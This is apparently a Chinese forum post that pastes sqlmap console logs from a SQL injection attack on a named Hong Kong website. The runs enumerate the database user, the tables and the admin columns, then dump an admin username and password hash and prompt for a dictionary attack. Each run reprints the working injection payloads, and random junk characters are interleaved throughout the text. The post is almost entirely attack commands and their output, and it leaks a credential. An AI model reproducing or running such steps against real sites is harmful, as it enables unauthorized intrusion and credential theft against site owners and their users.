D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
" `2 \% Z" e0 w9 Nms "Mysql" --current-user /* 注解:获取当前用户名称 \0 e6 \' K! D4 c
sqlmap/0.9 - automatic SQL injection and database takeover tool3 H5 |3 d9 s& O; p" l, u7 v0 c8 ]
http://sqlmap.sourceforge.net starting at: 16:53:548 v3 k4 d1 T1 R/ W: O# R
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as3 G" y `8 n& P* s" K, p! c
session file
$ x/ x* k% C0 i[16:53:54] [INFO] resuming injection data from session file& q6 p, n) S3 g7 `; ?% v
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file/ b6 s8 a( w( ?/ W5 R6 L
[16:53:54] [INFO] testing connection to the target url9 `4 H, l C T8 {* O. `. ^: W
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ o# ?$ n) c# j$ E7 C( Q2 csts:
, x3 ? ~- q( t5 F& o4 q6 [8 W3 u" R- U---0 j& g# ?* X6 @$ }0 r7 f8 P+ I
Place: GET/ @0 s9 e- S6 g Q, T, d
Parameter: id9 f( o2 O) d: q8 L# _& V2 S
Type: boolean-based blind
8 ?( ^# l7 A" G6 w Title: AND boolean-based blind - WHERE or HAVING clause
: V, P2 g+ J d# y Payload: id=276 AND 799=799
{* g9 L/ i, H; @1 I* B Type: error-based
* v3 p: Z/ b$ y4 @* } Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
4 F& I! X' m' N5 U Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,, j9 h, n. l. p6 \6 \" W
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,586 J) W6 ?, R {' Y) Q8 ]' o. p7 n! w
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ i, W- D( I: N- ^7 A+ ~) c2 I
Type: UNION query' e( B& P: E0 G& Q; R; h0 |8 c- I
Title: MySQL UNION query (NULL) - 1 to 10 columns
/ `6 w. s7 N& [- @! r) J+ o. ^# ?5 O Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 a% {! T+ T) }1 Z% f) I) x+ {(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, P( P0 | K E) P5 _. Q6 [
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 O7 a; y" w4 [1 X9 [
Type: AND/OR time-based blind1 l2 t) Y/ Q& x9 T; z, h2 o
Title: MySQL > 5.0.11 AND time-based blind
5 S* C3 N& s+ a/ Y3 C; W Payload: id=276 AND SLEEP(5)8 X) U8 a5 m+ \& X9 z* a- x* W4 X
---* U) d: s d: v" ]2 O3 W' V
[16:53:55] [INFO] the back-end DBMS is MySQL
! h0 I7 q1 Y; T e' sweb server operating system: Windows
9 i. }+ A( I& Tweb application technology: Apache 2.2.11, PHP 5.3.06 Q% G0 ?3 G* }
back-end DBMS: MySQL 5.0
2 }5 Y( W1 V# {7 e F7 c8 ^[16:53:55] [INFO] fetching current user! H b. D, r- F+ { k5 s
current user: 'root@localhost' # h3 V0 t9 b; S2 T7 U
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou+ }/ D, L, y- h; V6 x2 f5 I3 u
tput\www.wepost.com.hk' shutting down at: 16:53:58' r, r& K" X4 O+ [; H3 X) l
: {/ L# y1 {6 D9 b" o7 r
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) G: F5 {6 c0 B) C: R
ms "Mysql" --current-db /*当前数据库
- f0 b: `3 C$ O% ? ?9 W* t sqlmap/0.9 - automatic SQL injection and database takeover tool
; N8 s8 c& O- c$ b http://sqlmap.sourceforge.net starting at: 16:54:16
) d1 \% W* c+ h+ d: ]0 ][16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
0 G6 K! [, y, _. H9 A0 h session file
/ ~" p7 m- E9 V+ l1 ]; b[16:54:16] [INFO] resuming injection data from session file
: Q9 {. M5 C- a. S" X[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
1 K6 ~) g( n- F9 Z" ?- Y$ }[16:54:16] [INFO] testing connection to the target url5 n' v( N& J9 n; P- ]
sqlmap identified the following injection points with a total of 0 HTTP(s) reque( }% z( t0 V# ^6 C2 M) j0 v
sts:
+ `: x7 o# t- f! L' g" o2 g0 Y* |---" o, Z+ h6 C9 o& b% B) d0 W
Place: GET
! R, Q; Z8 s" Z- d1 f1 S/ vParameter: id
# L' D# `) q" O8 C P9 Q Type: boolean-based blind& K7 h. J! @) Z) i& s- r% T
Title: AND boolean-based blind - WHERE or HAVING clause& h6 Z) i! A0 s, c6 c; _3 t" b0 T0 _1 r
Payload: id=276 AND 799=799
$ V. `8 Q0 }& k! b Type: error-based
- Y. e8 E2 V& x: T8 N Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
* W! R) ?; b( q5 w( X# X Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 D5 l z: D- l/ I; L120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,580 y1 M& Z0 B1 ?" r
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 Y; H9 { ^* M7 x Type: UNION query3 } P; N/ r0 G; g" y1 @2 j
Title: MySQL UNION query (NULL) - 1 to 10 columns8 B5 K& o/ r0 K F1 _9 d$ V
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR! \- p! A! j6 b% j. b& d( n3 \
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
( ^; j) a6 ^9 v; P2 ]( O) p/ {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, u% S q: A, w' @ Type: AND/OR time-based blind# e2 E: J! }* P7 v1 d* C
Title: MySQL > 5.0.11 AND time-based blind: M% f0 @5 L* o
Payload: id=276 AND SLEEP(5)9 i! E' ?$ R5 f$ E
---$ A- |% N9 `; C% X1 Z8 n; T- r
[16:54:17] [INFO] the back-end DBMS is MySQL7 U# t; o }$ H7 Q2 U9 c3 X8 d
web server operating system: Windows
! `" [7 z5 ?7 \* xweb application technology: Apache 2.2.11, PHP 5.3.05 n F3 v0 E% j+ r* p6 h0 T
back-end DBMS: MySQL 5.0' O) \6 x0 X) {! Z* C N: d+ @' k% P
[16:54:17] [INFO] fetching current database
5 D8 Z8 |' i( u/ tcurrent database: 'wepost'
, B+ `, b- @- u: F) y[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou( \. K' ? a/ x* ? s
tput\www.wepost.com.hk' shutting down at: 16:54:18% K+ X, G H! z& h$ f4 m" P7 h
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 i/ s# z) f( Z1 x& Q
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
0 N& o3 \5 `) V sqlmap/0.9 - automatic SQL injection and database takeover tool
$ b7 j$ v2 O* ~8 @4 W+ | http://sqlmap.sourceforge.net starting at: 16:55:25& \' M% Y& r" n9 l% ^8 R
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as. `2 a' v c# S9 C( R) H" o6 l* T
session file9 h: Y$ y5 \) W2 }
[16:55:25] [INFO] resuming injection data from session file$ i4 `) V( M: k6 X
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file& y, X- y! P7 y$ Q, J$ ]9 N1 L
[16:55:25] [INFO] testing connection to the target url% a' K( l+ S O2 |5 A
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
* d( Y0 S* S* R4 W4 Asts:
0 V( h6 A" n/ s4 @1 k- h$ A! G---
% M7 D$ ^) I X; J. w l W6 CPlace: GET) j& T# o7 O; q* a8 R; l8 Q
Parameter: id
, z8 r6 u( b% C7 E+ W6 i Type: boolean-based blind
( t2 j8 b+ H$ t Title: AND boolean-based blind - WHERE or HAVING clause* y5 Z' ^1 U, B, y8 u5 `+ h
Payload: id=276 AND 799=799
3 v, ]- B$ h' J( K$ t3 |) G( `4 `. k. p Type: error-based
9 i$ K# {8 q' z+ ?$ e Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ W: C3 k& A, c' P) u Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
% s. M& U4 y$ |% F* `120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ R/ c' f% o$ D3 X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
3 s a3 [5 x0 s" H& O0 a- N Type: UNION query
. }- e' E; s" N! [& r Title: MySQL UNION query (NULL) - 1 to 10 columns
# z* R% y) J* P, d0 f1 J' _% v Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 p6 [$ s/ P' [3 K3 f( q
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 q# x6 K% Y3 i5 F2 g; uCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 V% R6 s" Z. @+ Z8 P: p; {
Type: AND/OR time-based blind
" e0 d# g: O1 u: x; X3 e Title: MySQL > 5.0.11 AND time-based blind
: s* _2 ~# D2 q& I. D7 k! C5 } Payload: id=276 AND SLEEP(5): p. c4 ^6 V/ {0 V
---
: C# m! p1 y. Z[16:55:26] [INFO] the back-end DBMS is MySQL% `8 x8 {% L: {$ X o5 ~
web server operating system: Windows5 T) D( I7 r" ~3 |( ?; ~: i5 F: }
web application technology: Apache 2.2.11, PHP 5.3.00 n& U% v1 l! S1 h% V0 }
back-end DBMS: MySQL 5.06 {% `9 j- M) l0 i/ |0 e
[16:55:26] [INFO] fetching tables for database 'wepost'; v3 H2 e6 ^* M, u4 V0 i
[16:55:27] [INFO] the SQL query used returns 6 entries9 D6 l( k9 h0 b# [7 N6 ^
Database: wepost
# {6 C% v2 @0 ]3 `+ m[6 tables]
5 c7 K9 {, v- }+-------------+' q5 E! A3 z$ v& j9 E, X+ P3 p. E
| admin |8 z+ _$ |" X: ?; ~
| article |
6 Y: G# x+ |& d2 p5 [| contributor |
! c2 e' B9 n5 E6 h9 k| idea |2 E4 a6 ^4 U+ X# _) @& I( c
| image |
$ j8 ~' V/ b9 Y) y5 ?| issue |
9 q/ a7 J* D* z7 g# N- ]) R+-------------+
* `: P+ N7 v3 l* ^' x a[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
/ l4 b& {- \8 z- `tput\www.wepost.com.hk' shutting down at: 16:55:33
2 Z9 I# B" Y# f+ T, I5 s0 {4 C. w, D( u8 k5 R2 Z Q: b9 `
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db6 q: G4 E1 T3 W$ }0 D- C
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
0 p3 V5 t; }8 H f8 X3 h% {6 { sqlmap/0.9 - automatic SQL injection and database takeover tool
" i1 S3 l( n8 P3 s( ] http://sqlmap.sourceforge.net starting at: 16:56:06
" `' _7 y) @0 E7 T! q) G F0 Gsqlmap identified the following injection points with a total of 0 HTTP(s) reque
& g* Y( h9 i S6 Q- i# Z' L, J9 Tsts:
5 g! H/ K! S1 j---
* s$ A3 N/ _! OPlace: GET# R/ |, u" h4 A7 _
Parameter: id
2 M% o0 w, m9 U Type: boolean-based blind
3 Z0 \+ \9 m) ^0 x Title: AND boolean-based blind - WHERE or HAVING clause
2 o, l# k. d" b' Y% j$ m Payload: id=276 AND 799=799
; D0 @0 @* ~+ v8 ?1 I Type: error-based
1 K/ W+ G! \- X+ c5 S, W$ r Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: Q& s7 {, U0 s" S& O
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
& Z+ I4 c! }0 A: @$ ] x120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,586 x7 I6 A8 c$ }3 D
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! {8 c% Q6 e% p+ o* O7 I) X7 z
Type: UNION query4 ^) c: l8 V2 K! a* R7 |
Title: MySQL UNION query (NULL) - 1 to 10 columns/ _& R% g$ E% z( n0 H
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! n9 r7 ^# _# T6 ]' M(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
8 A5 F# R* g; L& M% `- GCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 T% n$ |, i% T5 ~: n
Type: AND/OR time-based blind+ a) k# F( ]. @$ l: l
Title: MySQL > 5.0.11 AND time-based blind9 [, z# i9 p2 |2 f% K) G6 A3 a9 D
Payload: id=276 AND SLEEP(5)) G6 B$ x' B! w( b" l
---% P$ L }) d1 x6 ]
web server operating system: Windows
- n5 R, d) f( b5 c, \+ f% O7 C% J( Fweb application technology: Apache 2.2.11, PHP 5.3.0- l+ K5 m" f( G7 k4 S7 a
back-end DBMS: MySQL 5.0& c/ g4 b0 N5 B# @% B6 x
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se8 g, u& U- H3 s* W2 r, V
ssion': wepost, wepost
5 y1 p$ w8 z6 s0 O! QDatabase: wepost7 T9 `0 _8 w; w3 l( P. G
Table: admin
( i5 j8 ~7 W3 o6 n[4 columns]' O# @$ r/ f5 `1 V. E. E* @" Y7 _8 j7 P
+----------+-------------+
! ~$ r6 T/ f0 b6 s| Column | Type |
3 i" l* `: L- ~& m8 H9 i; f+----------+-------------+
! G) |7 J& R3 v( N B. D| id | int(11) |
; j! N2 n3 B5 v: `| password | varchar(32) |8 o+ k& z9 |) }; e6 q6 M
| type | varchar(10) |0 U( x9 I% g3 o# {5 H+ m H
| userid | varchar(20) |
; g9 { _7 X' R0 T+----------+-------------+9 \9 L3 c+ c7 A' Y" }
shutting down at: 16:56:19: `4 R/ U, H! R+ I# X
8 I) v! u( H, _9 H2 p
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( y& ?+ [4 O/ K) l ?1 ?/ D( d( |
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
3 D. T( D3 m' x sqlmap/0.9 - automatic SQL injection and database takeover tool
3 |; U/ E* g7 z3 | w6 v/ m7 I http://sqlmap.sourceforge.net starting at: 16:57:14( C* `* Z' w+ ~0 z, r6 o# a4 K j* o
sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 J8 }6 ~7 |/ o7 _- y
sts:6 U) h( z# F; r ~0 M! ~7 j
---" `$ Z8 Y* }2 a" \
Place: GET. P1 K* c7 Y: J* ?
Parameter: id
1 {3 g; t5 |/ c+ C. N Type: boolean-based blind* k" L- ^8 e4 i
Title: AND boolean-based blind - WHERE or HAVING clause
3 H; H% H, X/ g9 l Payload: id=276 AND 799=799
4 ~0 C1 Y9 n: R3 T1 E Type: error-based5 q O* @% C, p: s% [* _
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
' Y4 H$ e0 X6 l3 ?/ j4 k; b5 p, h Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,* f! s) L4 D7 f' ]% i8 f
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58. h( W* r; r1 X; Q F$ S1 D8 a
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) N, x1 {( ]. ~
Type: UNION query
* m2 ]1 I- d8 K Title: MySQL UNION query (NULL) - 1 to 10 columns2 T6 ? t6 q. C' ?- g6 J
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- [' n1 j ~% N ?
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 G' o% W9 j9 t0 a0 iCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; z: l) R- Q4 @7 Z: _4 Q Type: AND/OR time-based blind' X: p7 Q2 }) }; t) P
Title: MySQL > 5.0.11 AND time-based blind- Y& S) m, N& a
Payload: id=276 AND SLEEP(5)! f3 F/ _, F$ S: S+ N3 S$ r( D
---
" l: q' i" R( D0 f, ]# S3 K. g0 Wweb server operating system: Windows( B4 R% F3 N7 K; R. W# E6 @
web application technology: Apache 2.2.11, PHP 5.3.0
$ G( w. E* ^3 G q, fback-end DBMS: MySQL 5.0
6 N) H& i j9 z, n. irecognized possible password hash values. do you want to use dictionary attack o
+ q! ]# L8 f, L8 ?4 rn retrieved table items? [Y/n/q] y% {# z) q; l! L( j X
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]+ Y/ s' l& g# R- P3 L4 O) ]
do you want to use common password suffixes? (slow!) [y/N] y
* X0 ?0 a l9 e F; pDatabase: wepost3 s) e5 \* T. s
Table: admin% \3 e F4 Y* }2 r X$ X5 R% A
[1 entry]5 Q! r; a1 u F6 T/ |* u+ _
+----------------------------------+------------+
2 F8 i5 j3 l# O& _| password | userid |
; f; I+ Q3 A# _+ Z+----------------------------------+------------+
* H. T9 H- V% c! X& }1 j5 e# n4 a3 D| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |) V! b8 k$ g+ u+ e9 s" H
+----------------------------------+------------+) c }+ M) D9 e. `# p1 S6 }
shutting down at: 16:58:14- m& `; v* k7 \% j
4 \# C2 Z$ J$ R" D7 SD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对